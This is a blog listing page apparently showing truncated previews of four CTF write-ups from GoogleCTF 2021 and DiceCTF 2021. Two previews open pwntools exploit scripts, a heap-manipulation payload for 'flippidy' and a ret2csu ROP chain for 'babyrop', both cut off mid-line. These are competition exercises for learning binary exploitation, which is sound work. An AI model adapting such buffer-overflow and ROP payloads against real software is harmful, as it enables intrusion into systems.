CTF(4)
-
[GoogleCTF quals 2021] adspam
We are given an APK called app-release.apk. I have never done APK reversing. https://balsn.tw/ctf_writeup/20210717-googlectf2021/#adspam https://ar..
2022.04.23 -
[GoogleCTF quals 2021] weather
A challenge I didn't get to look at for long. The main function uses format specifiers I had never seen before (IDA Freeware). Apparently you can declare format specifiers with register_printf_function. Looking at sub_225A, which is registered for T:

    __int64 __fastcall sub_225A(FILE *stream, const struct printf_info *info, const void *const *args)
    {
      return (unsigned int)fprintf(stream, "%d%s", ***(unsigned int ***)args, *(const char **)(**(_QWORD **)args + 8LL));
    }

That is how it looks, so if London is given as input:

    if ( !strcmp("London", s2) ) { v10 ..
2022.04.09 -
[DiceCTF 2021] flippidy
    # exploit.py
    from pwn import *
    #context.log_level = 'debug'
    p = process("./fl")
    lib = ELF("./libc-2.27.so")
    #p = remote("dicec.tf", 31904)

    def Mal(idx, data):
        p.sendlineafter(":", b'1')
        p.sendlineafter(":", str(idx))
        p.sendlineafter(":", data)

    def Flip():
        p.sendlineafter(":", b'2')

    p.sendlineafter(":", b'3')
    Mal(1, p64(0x404020))
    Flip()
    payload = p64(0x404040)
    payload += p64(0x404120)*3
    payload ..
2021.02.08 -
[DiceCTF 2021] babyrop
    # exploit.py
    from pwn import *
    #context.log_level = 'debug'
    p = process("./babyrop")
    #p = remote("dicec.tf", 31924)
    e = ELF("./babyrop")
    setcsu = 0x4011ca
    csu = 0x4011b0

    def chaining(func, p1, p2, p3):
        ret = p64(0)
        ret += p64(1)
        ret += p64(p1)
        ret += p64(p2)
        ret += p64(p3)
        ret += p64(func)
        ret += p64(csu)
        ret += p64(0)
        return ret

    payload = b'A'*0x48
    payload += p64(setcsu)
    payload += chaining(e.g..
2021.02.08